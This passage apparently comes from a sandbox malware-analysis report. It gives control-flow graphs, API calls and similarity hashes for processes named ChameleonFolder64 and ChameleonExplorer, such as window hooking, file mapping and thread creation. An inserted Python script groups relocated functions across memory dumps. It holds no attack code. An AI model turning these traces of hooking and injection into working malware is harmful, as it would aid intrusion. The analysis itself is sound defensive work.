                                                                                                             • 253 22683b7-22683c2 -> 255, 256
                                                                                                             • 254 22683a8-22683b0 -> 253
                                                                                                             • 255 22683c4-22683cc -> 256
                                                                                                             • 256 22683d3 -> 252
                                                                                                             • 257 2268326-2268369 MapViewOfFile -> 260, 261
                                                                                                             • 258 2268313-2268321 -> 252
                                                                                                             • 260 2268394 -> 263
                                                                                                             • 261 226836b-226838d -> 260
                                                                                                             • 263 2268399 -> 252
                                                                                                            APIs
                                                                                                            • CreateFileMappingW.KERNELBASE ref: 022682F7
                                                                                                            • MapViewOfFile.KERNELBASE ref: 02268356
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000C.00000002.2928739049.0000000002267000.00000020.00000001.01000000.00000011.sdmp, Offset: 02267000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_12_2_2267000_ChameleonFolder64.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: File$CreateMappingView
                                                                                                            • String ID: H
                                                                                                            • API String ID: 3452162329-2852464175
                                                                                                            • Opcode ID: 64d95b279b88c49e25f273251f667473079603675f6e0e152eb5843f11b6a295
                                                                                                            • Instruction ID: 129d0fb4357e86969b62e01ab3ec5949b0e74cf0dd403c24a386118b5dba1187
                                                                                                            • Opcode Fuzzy Hash: 64d95b279b88c49e25f273251f667473079603675f6e0e152eb5843f11b6a295
                                                                                                            • Instruction Fuzzy Hash: CE317E71128A4D8FEB94EF6CE88877533E1FB49304F4086A5E01AC72B4DB78D884CB02

                                                                                                            Control-flow Graph

                                                                                                             control_flow_graph 2268030 (1 basic block; block id, address range, API calls, successors)
                                                                                                             • 264 2268030-2268086 CreateThread SetThreadPriority ResumeThread -> none
                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000C.00000002.2928739049.0000000002267000.00000020.00000001.01000000.00000011.sdmp, Offset: 02267000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_12_2_2267000_ChameleonFolder64.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Thread$CreatePriorityResume
                                                                                                            • String ID:
                                                                                                            • API String ID: 2021017085-0
                                                                                                            • Opcode ID: 2fc43ddb754d5fd58a377cf2c23cb7cb11baaf4f50db15b93fcb8d7733540021
                                                                                                            • Instruction ID: 7aeeb0365904e094b4c4adb11d48f1c753c0f33ea4bb205a7b8f39998d2ceb3e
                                                                                                            • Opcode Fuzzy Hash: 2fc43ddb754d5fd58a377cf2c23cb7cb11baaf4f50db15b93fcb8d7733540021
                                                                                                            • Instruction Fuzzy Hash: 61E0ED306549484FEF14EF34DC45656BBE6F799314F5142AA841AC22A0DF788246CB46

                                                                                                            Control-flow Graph

                                                                                                             control_flow_graph 21ae300 (43 basic blocks; block id, address range, calls, successors)
                                                                                                             • 265 21ae300-21ae31b -> 266, 267
                                                                                                             • 266 21ae67a-21ae684 -> none
                                                                                                             • 267 21ae321-21ae3a7 call 21ae6b0 -> 273, 274
                                                                                                             • 273 21ae3a9-21ae3b0 GetNativeSystemInfo -> 274
                                                                                                             • 274 21ae3b5-21ae3dd -> 275, 276
                                                                                                             • 275 21ae3df-21ae3e6 -> 277, 278
                                                                                                             • 276 21ae3f1-21ae40d -> 279
                                                                                                             • 277 21ae3e8-21ae3ef -> 276, 278
                                                                                                             • 278 21ae45e-21ae47c -> 283, 284
                                                                                                             • 279 21ae415-21ae417 -> 280, 281
                                                                                                             • 280 21ae419-21ae429 -> 281
                                                                                                             • 281 21ae431-21ae458 -> 278
                                                                                                             • 283 21ae5d2-21ae5de -> 285, 286
                                                                                                             • 284 21ae482-21ae487 -> 287, 288
                                                                                                             • 285 21ae5e0-21ae5e2 -> 291, 292
                                                                                                             • 286 21ae5f1-21ae604 -> 266
                                                                                                             • 287 21ae489-21ae48e -> 266, 293
                                                                                                             • 288 21ae4be-21ae4ca -> 289, 290
                                                                                                             • 289 21ae4eb-21ae4f2 -> 296, 297
                                                                                                             • 290 21ae4cc-21ae4ce -> 294, 295
                                                                                                             • 291 21ae606-21ae619 -> 266
                                                                                                             • 292 21ae5e4-21ae5e9 -> 266, 298
                                                                                                             • 293 21ae494-21ae4a0 -> 266, 300
                                                                                                             • 294 21ae4d0-21ae4d5 -> 301, 302
                                                                                                             • 295 21ae524-21ae52b -> 305, 306
                                                                                                             • 296 21ae50c-21ae51f -> 266
                                                                                                             • 297 21ae4f4-21ae507 -> 266
                                                                                                             • 298 21ae5ef-21ae622 -> 313, 314
                                                                                                             • 300 21ae4a6-21ae4b9 -> 266
                                                                                                             • 301 21ae4db-21ae4e0 -> 266, 308
                                                                                                             • 302 21ae55d-21ae564 -> 309, 310
                                                                                                             • 305 21ae52d-21ae540 -> 266
                                                                                                             • 306 21ae545-21ae558 -> 266
                                                                                                             • 308 21ae4e6-21ae5a0 call 21ae2a0 -> 327, 328
                                                                                                             • 309 21ae57e-21ae591 -> 266
                                                                                                             • 310 21ae566-21ae579 -> 266
                                                                                                             • 313 21ae643-21ae650 -> 324, 325
                                                                                                             • 314 21ae624-21ae62c -> 313, 315
                                                                                                             • 315 21ae62e-21ae641 -> 266
                                                                                                             • 324 21ae652-21ae665 -> 266
                                                                                                             • 325 21ae667-21ae66f -> 266
                                                                                                             • 327 21ae5ba-21ae5cd -> 266
                                                                                                             • 328 21ae5a2-21ae5b5 -> 266
                                                                                                            APIs
                                                                                                            • GetNativeSystemInfo.KERNELBASE ref: 021AE3B0
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000C.00000002.2928739049.00000000021AE000.00000020.00000001.01000000.00000011.sdmp, Offset: 021AE000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_12_2_21ae000_ChameleonFolder64.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: InfoNativeSystem
                                                                                                            • String ID:
                                                                                                            • API String ID: 1721193555-0
                                                                                                            • Opcode ID: b02a775a06d7593498e5acf7292e600cc3c8de52e0e4f34340e7111788e0720f
                                                                                                            • Instruction ID: 176f182c50e772896ce10e60a6330080bb80e55bd819838d5cfd5b7deb33ae4f
                                                                                                            • Opcode Fuzzy Hash: b02a775a06d7593498e5acf7292e600cc3c8de52e0e4f34340e7111788e0720f
                                                                                                            • Instruction Fuzzy Hash: 34919E3519550ACEEB64EF28ED607E637A2FB18344F508237DC1BC21A1EB389585CFA4

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 332 2267f90-2267fb6 334 2267ff6-226800a 332->334 335 2267fb8-2267fe2 SetWindowsHookExW 332->335 337 2268015-2268024 334->337 338 226800c-2268013 334->338 335->334 338->337 339 2267fe4-2267fee 338->339 339->334
                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000C.00000002.2928739049.0000000002267000.00000020.00000001.01000000.00000011.sdmp, Offset: 02267000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_12_2_2267000_ChameleonFolder64.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: HookWindows
                                                                                                            • String ID:
                                                                                                            • API String ID: 2559412058-0
                                                                                                            • Opcode ID: 4a13e9e2dc0b3fd7673bf0f609cff19fbedb4852650dfecb80521084deb408a9
                                                                                                            • Instruction ID: 5e5247147f38648d489757b4ee488dd756d8cce741c98e9c72d9e3ac67a57b1b
                                                                                                            • Opcode Fuzzy Hash: 4a13e9e2dc0b3fd7673bf0f609cff19fbedb4852650dfecb80521084deb408a9
                                                                                                            • Instruction Fuzzy Hash: 21016231524A4C8FEF64EF68D844BB673A1E714304F01436AA81AC6694DF34D486CB41

                                                                                                            Control-flow Graph

                                                                                                            control_flow_graph 341 2267fa0-2267fb6 342 2267ff6-226800a 341->342 343 2267fb8-2267fe2 SetWindowsHookExW 341->343 345 2268015-2268024 342->345 346 226800c-2268013 342->346 343->342 346->345 347 2267fe4-2267fee 346->347 347->342
                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000C.00000002.2928739049.0000000002267000.00000020.00000001.01000000.00000011.sdmp, Offset: 02267000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_12_2_2267000_ChameleonFolder64.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: HookWindows
                                                                                                            • String ID:
                                                                                                            • API String ID: 2559412058-0
                                                                                                            • Opcode ID: 46d193b6c8daed4bf02707ba233f577279aa029b77350af6a806d5010acb989d
                                                                                                            • Instruction ID: e27755c8bbc35eb41703410adfc13b66563ea5adef4cbcb8e29a02cec4b2d440
                                                                                                            • Opcode Fuzzy Hash: 46d193b6c8daed4bf02707ba233f577279aa029b77350af6a806d5010acb989d
                                                                                                            • Instruction Fuzzy Hash: 3901713112490C8FDF28EF64D844BBA77A1FB14318F0143AAA81AC6290DF34D486CB81

                                                                                                            Control-flow Graph

                                                                                                            control_flow_graph 349 2184e25-2184e28 350 2184e2a-2184e3a 349->350 351 2184e44-2184e53 349->351 355 2184e6d-2184e7c 350->355 358 2184e3c-2184e3f 350->358 352 2184e59-2184e68 351->352 353 2184eec-2184eee 351->353 352->355 356 2184ef0 call 2184850 353->356 357 2184ef5-2184eff 353->357 355->353 356->357 360 2184f94-2184fa0 357->360 361 2184f05-2184f48 357->361 358->351 364 2184fcc-2184fd2 call 2184a10 360->364 365 2184fa2-2184fb6 360->365 362 2184f4a-2184f55 361->362 363 2184f5e-2184f5f 361->363 362->363 366 2184f57 362->366 363->360 370 2184fd7-2184fdd 364->370 367 2184fb8 365->367 368 2184fba-2184fca 365->368 366->363 367->368 371 2184ff1 368->371 370->371 372 2184fdf-2184fe7 370->372 372->371
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000C.00000002.2928739049.0000000002181000.00000020.00000001.01000000.00000011.sdmp, Offset: 02181000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_12_2_2181000_ChameleonFolder64.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 389f5320ad7093fa945a599d697ecaceda258c413693d1ce816d310bb983f33e
                                                                                                            • Instruction ID: ff11d8008629855868188b89dd24b6a72c9defc50ad1bf0e04ff76ced67a04f3
                                                                                                            • Opcode Fuzzy Hash: 389f5320ad7093fa945a599d697ecaceda258c413693d1ce816d310bb983f33e
                                                                                                            • Instruction Fuzzy Hash: A1412472548A5A8FCB28EF1CC4D4320B7E1FB65304B2A828EC859CF656DB74D881CF90

                                                                                                            Control-flow Graph

                                                                                                            control_flow_graph 373 2184a10-2184a33 call 2184970 call 2184680 377 2184a38-2184a3e 373->377 378 2184a40-2184a95 377->378 379 2184a97-2184aa2 377->379 380 2184aa4-2184aa9 378->380 379->380
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000C.00000002.2928739049.0000000002181000.00000020.00000001.01000000.00000011.sdmp, Offset: 02181000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_12_2_2181000_ChameleonFolder64.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 9bb406301e24437c841f3dc2675e0d29e136f589c5054ba5dd485402079a7ca4
                                                                                                            • Instruction ID: f1bb65a8d009d2525adac39144f24a83bbe5bd279837b28def949d40fa435416
                                                                                                            • Opcode Fuzzy Hash: 9bb406301e24437c841f3dc2675e0d29e136f589c5054ba5dd485402079a7ca4
                                                                                                            • Instruction Fuzzy Hash: 82014FB1601E0A8FD758EF6895CC3263AD6F729305F20417EA54DCB679DBB184868F84

                                                                                                            Control-flow Graph

                                                                                                            control_flow_graph 402 2199b40-2199b52 403 2199b6c-2199b70 402->403 404 2199b54-2199b55 402->404 405 2199b60-2199b61 404->405 405->403
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000C.00000002.2928739049.0000000002199000.00000020.00000001.01000000.00000011.sdmp, Offset: 02199000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_12_2_2199000_ChameleonFolder64.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 27b82fb93593e14b94ca17fc8e8b4daf4b4b6affc90cb308ffe96dbe6b776e98
                                                                                                            • Instruction ID: 196e66398a9c6a7d2d31eaacdd5a0cb569df825e3d032fda1c8f49cd6f8b8182
                                                                                                            • Opcode Fuzzy Hash: 27b82fb93593e14b94ca17fc8e8b4daf4b4b6affc90cb308ffe96dbe6b776e98
                                                                                                            • Instruction Fuzzy Hash: B6D0C7314985094ACB29FB31DC949953265F7443387900355C563D14F0EB2D1558DE81

                                                                                                            Control-flow Graph

                                                                                                            control_flow_graph 406 21a0a40-21a0a48 407 21a0a4a-21a0a4b 406->407 408 21a0a4e-21a0a54 406->408 407->408 409 21a0a5a-21a0a63 408->409 410 21a0a56-21a0a57 408->410 411 21a0b28-21a0b2a 409->411 412 21a0a69-21a0a6c 409->412 410->409 412->411 413 21a0a72-21a0a74 412->413 414 21a0a7e-21a0a7f 413->414 415 21a0a76-21a0a7c 413->415 416 21a0a81-21a0a87 414->416 415->416 417 21a0a8d-21a0a9e 416->417 418 21a0b27 416->418 419 21a0b1a-21a0b21 417->419 420 21a0aa0-21a0ab4 417->420 418->411 419->417 419->418 421 21a0ada-21a0af4 420->421 422 21a0ab6-21a0ab9 420->422 421->419 425 21a0af6-21a0af9 421->425 423 21a0abb-21a0abe 422->423 424 21a0ac3-21a0ac6 422->424 423->424 426 21a0ac0 423->426 427 21a0ac8-21a0acb 424->427 428 21a0ad0-21a0ad2 424->428 429 21a0afb-21a0afe 425->429 430 21a0b03-21a0b06 425->430 426->424 427->428 433 21a0acd 427->433 428->421 434 21a0ad4-21a0ad8 428->434 429->430 435 21a0b00 429->435 431 21a0b08-21a0b0b 430->431 432 21a0b10-21a0b12 430->432 431->432 436 21a0b0d 431->436 432->419 437 21a0b14-21a0b18 432->437 433->428 434->411 435->430 436->432 437->411
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000C.00000002.2928739049.0000000002199000.00000020.00000001.01000000.00000011.sdmp, Offset: 02199000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_12_2_2199000_ChameleonFolder64.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: a$a$z$z
                                                                                                            • API String ID: 0-3217829273
                                                                                                            • Opcode ID: e549a898086fe992de222b4ed16a90abae3ac20dd35349c3e5caa1a660c80229
                                                                                                            • Instruction ID: 842c929a1baf723d1aefcaf6c6cbb7d825c1de5eff6fcee178048658c0dd0b47
                                                                                                            • Opcode Fuzzy Hash: e549a898086fe992de222b4ed16a90abae3ac20dd35349c3e5caa1a660c80229
                                                                                                            • Instruction Fuzzy Hash: 5421D42EBE7A2E461B3C18BC5EF837DA181E61D74D73A633AC893D2245E78198834185

                                                                                                            Execution Graph

                                                                                                            Execution Coverage:44.7%
                                                                                                            Dynamic/Decrypted Code Coverage:100%
                                                                                                            Signature Coverage:0%
                                                                                                            Total number of Nodes:16
                                                                                                            Total number of Limit Nodes:0
                                                                                                            execution_graph 3080 3337ee0 3081 3337f19 3080->3081 3082 3337f00 3080->3082 3081->3082 3083 3337f40 PostMessageW 3081->3083 3083->3082 3084 327e300 3085 327e321 3084->3085 3087 327e3b5 3084->3087 3086 327e3a9 GetNativeSystemInfo 3085->3086 3085->3087 3086->3087 3088 333ecdb 3090 33437e8 3088->3090 3089 3343b62 3090->3089 3092 33382b0 3090->3092 3093 33382ca 3092->3093 3097 3338313 3092->3097 3094 33382d2 CreateFileMappingW 3093->3094 3093->3097 3095 3338326 MapViewOfFile 3094->3095 3094->3097 3095->3097 3097->3089
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000F.00000002.2948534595.000000000333C000.00000020.00000001.01000000.00000011.sdmp, Offset: 0333C000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_15_2_333c000_ChameleonExplorer.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: d60f8929764bcb4e8e48305e511a2863114631a97fccbb23d8fbaf06acf2663b
                                                                                                            • Instruction ID: a469887753dd29e1d3cf8742ad95ce92fa2f5569df249a74845f1bd248020249
                                                                                                            • Opcode Fuzzy Hash: d60f8929764bcb4e8e48305e511a2863114631a97fccbb23d8fbaf06acf2663b
                                                                                                            • Instruction Fuzzy Hash: E2F332A644E7C05FCB42CB78C9D6692BFF5AE1721070B54D7C081CF1A3D618BA2BA716

                                                                                                            Control-flow Graph

                                                                                                            control_flow_graph 248 33382b0-33382c4 249 333839b-33383a6 248->249 250 33382ca-33382cc 248->250 251 33383b7-33383c2 249->251 252 33383a8-33383b0 249->252 253 33382d2-3338311 CreateFileMappingW 250->253 254 33383d8-33383dd 250->254 255 33383d3 251->255 256 33383c4-33383cc 251->256 252->251 257 3338313-3338321 253->257 258 3338326-3338369 MapViewOfFile 253->258 255->254 256->255 257->254 260 3338394 258->260 261 333836b-333838d 258->261 263 3338399 260->263 261->260 263->254
                                                                                                            APIs
                                                                                                            • CreateFileMappingW.KERNELBASE ref: 033382F7
                                                                                                            • MapViewOfFile.KERNELBASE ref: 03338356
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000F.00000002.2948534595.0000000003337000.00000020.00000001.01000000.00000011.sdmp, Offset: 03337000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_15_2_3337000_ChameleonExplorer.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: File$CreateMappingView
                                                                                                            • String ID: H
                                                                                                            • API String ID: 3452162329-2852464175
                                                                                                            • Opcode ID: 64d95b279b88c49e25f273251f667473079603675f6e0e152eb5843f11b6a295
                                                                                                            • Instruction ID: 3caf7420794419d252ebf0af915bf7bff638cc6b6b7110c6854423d47df45c57
                                                                                                            • Opcode Fuzzy Hash: 64d95b279b88c49e25f273251f667473079603675f6e0e152eb5843f11b6a295
                                                                                                            • Instruction Fuzzy Hash: F7313E74114A0C8FEB94EF2CD88476577E1FB59314F448665E10ACB3B0DB78D885CB01

                                                                                                            Control-flow Graph

                                                                                                            control_flow_graph 264 327e300-327e31b 265 327e321-327e3a7 call 327e6b0 264->265 266 327e67a-327e684 264->266 272 327e3b5-327e3dd 265->272 273 327e3a9-327e3b0 GetNativeSystemInfo 265->273 274 327e3f1-327e40d 272->274 275 327e3df-327e3e6 272->275 273->272 278 327e415-327e417 274->278 276 327e45e-327e47c 275->276 277 327e3e8-327e3ef 275->277 282 327e5d2-327e5de 276->282 283 327e482-327e487 276->283 277->274 277->276 279 327e431-327e458 278->279 280 327e419-327e429 278->280 279->276 280->279 284 327e5f1-327e604 282->284 285 327e5e0-327e5e2 282->285 286 327e4be-327e4ca 283->286 287 327e489-327e48e 283->287 284->266 288 327e606-327e619 285->288 289 327e5e4-327e5e9 285->289 291 327e4cc-327e4ce 286->291 292 327e4eb-327e4f2 286->292 287->266 290 327e494-327e4a0 287->290 288->266 289->266 293 327e5ef-327e622 289->293 290->266 297 327e4a6-327e4b9 290->297 298 327e524-327e52b 291->298 299 327e4d0-327e4d5 291->299 294 327e4f4-327e507 292->294 295 327e50c-327e51f 292->295 311 327e624-327e62c 293->311 312 327e643-327e650 293->312 294->266 295->266 297->266 302 327e545-327e558 298->302 303 327e52d-327e540 298->303 304 327e55d-327e564 299->304 305 327e4db-327e4e0 299->305 302->266 303->266 306 327e566-327e579 304->306 307 327e57e-327e591 304->307 305->266 308 327e4e6-327e5a0 call 327e2a0 305->308 306->266 307->266 326 327e5a2-327e5b5 308->326 327 327e5ba-327e5cd 308->327 311->312 315 327e62e-327e641 311->315 322 327e667-327e66f 312->322 323 327e652-327e665 312->323 315->266 322->266 323->266 326->266 327->266
                                                                                                            APIs
                                                                                                            • GetNativeSystemInfo.KERNEL32 ref: 0327E3B0
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000F.00000002.2948534595.000000000327E000.00000020.00000001.01000000.00000011.sdmp, Offset: 0327E000, based on PE: false
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_15_2_327e000_ChameleonExplorer.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: InfoNativeSystem
                                                                                                            • String ID:
                                                                                                            • API String ID: 1721193555-0
                                                                                                            • Opcode ID: b02a775a06d7593498e5acf7292e600cc3c8de52e0e4f34340e7111788e0720f
                                                                                                            • Instruction ID: a12524dc196f45218158ae5b83b844986a364f2b42d5d9560518bef76d8aafe4
                                                                                                            • Opcode Fuzzy Hash: b02a775a06d7593498e5acf7292e600cc3c8de52e0e4f34340e7111788e0720f
                                                                                                            • Instruction Fuzzy Hash: 71918C3113560A8EEB21EF28ED507E637A5FB14344F458267DC07C62A0EAB8E5C5CBA5
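The function at 21ae300 in the ChameleonFolder64 dump (process 12) and the function at 327e300 in the ChameleonExplorer dump (process 15) carry the same Opcode ID (b02a775a...) but different Instruction IDs and fuzzy hashes: the Opcode ID is stable across the relocation while the address-dependent hashes are not, which makes it the key for recognising one body of code loaded at two bases in two processes. The script below is an added example, not part of the Joe Sandbox report or its tooling. It parses the textual control_flow_graph records (block ids, address ranges, internal calls, API names, edges) and the bullet metadata that follows each one, then groups functions across dumps by Opcode ID. The sample input is copied from the records above, with the two long GetNativeSystemInfo graph lines cut down to their first blocks and only their original edges kept. The meaning of the snapshot file name fields (process index, dump kind, base, image name) is an assumption, inferred from the Source File prefixes that match them (0000000C = 12, 0000000F = 15).

```python
"""Parse the textual control_flow_graph records of a Joe Sandbox report and match
functions across memory dumps by Opcode ID. Added example, not report tooling."""
import re
from collections import defaultdict
from dataclasses import dataclass, field

EDGE = re.compile(r"^(\d+)->(\d+)$")
# Assumed layout of the snapshot file name: process index, dump kind, base, image.
# The process index equals the decimal Source File prefix (0000000C -> 12).
SNAPSHOT = re.compile(r"hcaresult_(\d+)_(\d+)_([0-9a-f]+)_(.+?)\.jbxd")


@dataclass
class Function:
    image: str = ""
    process_index: int = -1
    blocks: dict = field(default_factory=dict)   # node id -> (start, end)
    edges: list = field(default_factory=list)    # (src id, dst id)
    apis: list = field(default_factory=list)     # (node id, API name)
    callees: list = field(default_factory=list)  # (node id, callee address)
    meta: dict = field(default_factory=dict)     # remaining bullet fields

    @property
    def entry(self):
        return self.blocks[next(iter(self.blocks))][0]  # first block listed


def parse_graph_line(line):
    """'<id> <lo>[-<hi>]' opens a basic block, 'call <addr>' and bare API names
    attach to the block opened most recently, '<a>-><b>' is a control-flow edge."""
    fn, tokens, current, i = Function(), line.split()[1:], None, 0
    while i < len(tokens):
        tok, edge = tokens[i], EDGE.match(tokens[i])
        if edge:
            fn.edges.append((edge.group(1), edge.group(2)))
            i += 1
        elif tok == "call":
            fn.callees.append((current, int(tokens[i + 1], 16)))
            i += 2
        elif tok.isdigit():  # a node id is always followed by its address range
            current = tok
            lo, _, hi = tokens[i + 1].partition("-")
            fn.blocks[current] = (int(lo, 16), int(hi or lo, 16))
            i += 2
        else:
            fn.apis.append((current, tok))
            i += 1
    return fn


def parse_report(text):
    """Each control_flow_graph line starts a record; the bullet lines up to the
    next one ('• Key: value') are its metadata."""
    functions = []
    for raw in text.splitlines():
        line = raw.strip()
        if line.startswith("control_flow_graph "):
            functions.append(parse_graph_line(line))
        elif line.startswith("\u2022") and functions:
            key, _, value = line.lstrip("\u2022 ").partition(":")
            fn, key, value = functions[-1], key.strip(), value.strip()
            m = SNAPSHOT.search(value) if key == "Snapshot File" else None
            if m:
                fn.process_index, fn.image = int(m.group(1)), m.group(4)
            else:
                fn.meta[key] = value
    return functions


def shared_code(functions):
    """Opcode IDs carried by more than one function: the same ID at different
    addresses in different dumps is one body of code relocated."""
    groups = defaultdict(list)
    for fn in functions:
        if "Opcode ID" in fn.meta:
            groups[fn.meta["Opcode ID"]].append((fn.image, fn.process_index, fn.entry))
    return {oid: hits for oid, hits in groups.items() if len(hits) > 1}


# Sample input copied from the report records above; the two GetNativeSystemInfo
# graph lines are cut down to their first blocks, keeping only original edges.
SAMPLE = """\
control_flow_graph 265 21ae300-21ae31b 266 21ae67a-21ae684 265->266 267 21ae321-21ae3a7 call 21ae6b0 265->267 273 21ae3a9-21ae3b0 GetNativeSystemInfo 267->273 274 21ae3b5-21ae3dd 267->274 273->274
• Snapshot File: hcaresult_12_2_21ae000_ChameleonFolder64.jbxd
• Opcode ID: b02a775a06d7593498e5acf7292e600cc3c8de52e0e4f34340e7111788e0720f
• Instruction ID: 176f182c50e772896ce10e60a6330080bb80e55bd819838d5cfd5b7deb33ae4f
control_flow_graph 264 327e300-327e31b 265 327e321-327e3a7 call 327e6b0 264->265 266 327e67a-327e684 264->266 272 327e3b5-327e3dd 265->272 273 327e3a9-327e3b0 GetNativeSystemInfo 265->273 273->272
• Snapshot File: hcaresult_15_2_327e000_ChameleonExplorer.jbxd
• Opcode ID: b02a775a06d7593498e5acf7292e600cc3c8de52e0e4f34340e7111788e0720f
• Instruction ID: a12524dc196f45218158ae5b83b844986a364f2b42d5d9560518bef76d8aafe4
"""

if __name__ == "__main__":
    for fn in parse_report(SAMPLE):
        print(fn.image, fn.process_index, hex(fn.entry), [a for _, a in fn.apis])
    print(shared_code(parse_report(SAMPLE)))
```

Run against a whole report export, the grouping reports every function that recurs across the process dumps, which is a quick way to see what part of an injected payload reached each host process; the per-function API and callee lists give the same view per function without opening the graphs.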

                                                                                                            Control-flow Graph

                                                                                                            control_flow_graph 331 3337ee0-3337efe 332 3337f00-3337f17 331->332 333 3337f19-3337f1f 331->333 338 3337f85-3337f8e 332->338 334 3337f21-3337f37 333->334 335 3337f39-3337f3a 333->335 337 3337f3c-3337f3e 334->337 335->337 339 3337f63-3337f82 337->339 340 3337f40-3337f5e PostMessageW 337->340 339->338 340->339
                                                                                                            APIs
Memory Dump Source
• Source File: 0000000F.00000002.2948534595.0000000003337000.00000020.00000001.01000000.00000011.sdmp, Offset: 03337000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_3337000_ChameleonExplorer.jbxd
Similarity
• API ID: MessagePost
• String ID:
• API String ID: 410705778-0
• Opcode ID: cfea4c8f6f5f84a2c6ebdfae95283b3ac1f83e9cbb844c77a03b184a5d3c0d09
• Instruction ID: c90e59041c40c2d46ef689024e9d32302449d391e7c8106db7cbea0275de1722
• Opcode Fuzzy Hash: cfea4c8f6f5f84a2c6ebdfae95283b3ac1f83e9cbb844c77a03b184a5d3c0d09
• Instruction Fuzzy Hash: FB21F370224A8CDFDF58EF1CD881AA937E2FF29344F544165E909C7261C775E881CB81

Control-flow Graph

Memory Dump Source
• Source File: 0000000F.00000002.2948534595.0000000003251000.00000020.00000001.01000000.00000011.sdmp, Offset: 03251000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_3251000_ChameleonExplorer.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 389f5320ad7093fa945a599d697ecaceda258c413693d1ce816d310bb983f33e
• Instruction ID: 3237928fa02905fb1f501bee0c4f0447915155e8691cebbbb7040a7eb24d4ee6
• Opcode Fuzzy Hash: 389f5320ad7093fa945a599d697ecaceda258c413693d1ce816d310bb983f33e
• Instruction Fuzzy Hash: 6B41F371424A568FCB68EF1DD4D4320F7E0FB65314B29828AEC49CB656D774DAC2CB90

Control-flow Graph

Memory Dump Source
• Source File: 0000000F.00000002.2927494034.0000000000746000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00746000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_746000_ChameleonExplorer.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 4bcff77bc2721812a55f674d8f4f993d9885c91fae5973ce83b17af82195670f
• Instruction ID: 32daaff3484038da6393a300b38faf94b765424933544a14b42670ef0bbccaf6
• Opcode Fuzzy Hash: 4bcff77bc2721812a55f674d8f4f993d9885c91fae5973ce83b17af82195670f
• Instruction Fuzzy Hash: 3B31FB30224A4C9FCB84EF18C885FA977E1FB59304F8551A5F84EC7252DB35E985CB81

Control-flow Graph

Memory Dump Source
• Source File: 0000000F.00000002.2948534595.0000000003251000.00000020.00000001.01000000.00000011.sdmp, Offset: 03251000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_3251000_ChameleonExplorer.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 9bb406301e24437c841f3dc2675e0d29e136f589c5054ba5dd485402079a7ca4
• Instruction ID: 88508bc51467204fd4a93c1d725cdd74278502713e565072f87d670f6583768a
• Opcode Fuzzy Hash: 9bb406301e24437c841f3dc2675e0d29e136f589c5054ba5dd485402079a7ca4
• Instruction Fuzzy Hash: D7018FB1611F0D8FD784EF69959C32A7AD6F729305F20007EB84DCB678C6B184C68B80

Control-flow Graph

Memory Dump Source
• Source File: 0000000F.00000002.2927494034.0000000000746000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00746000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_746000_ChameleonExplorer.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 337d149f2599faf40f8f4b5b24f55f0b289ac114d62a12b1cb2572cf3c548eee
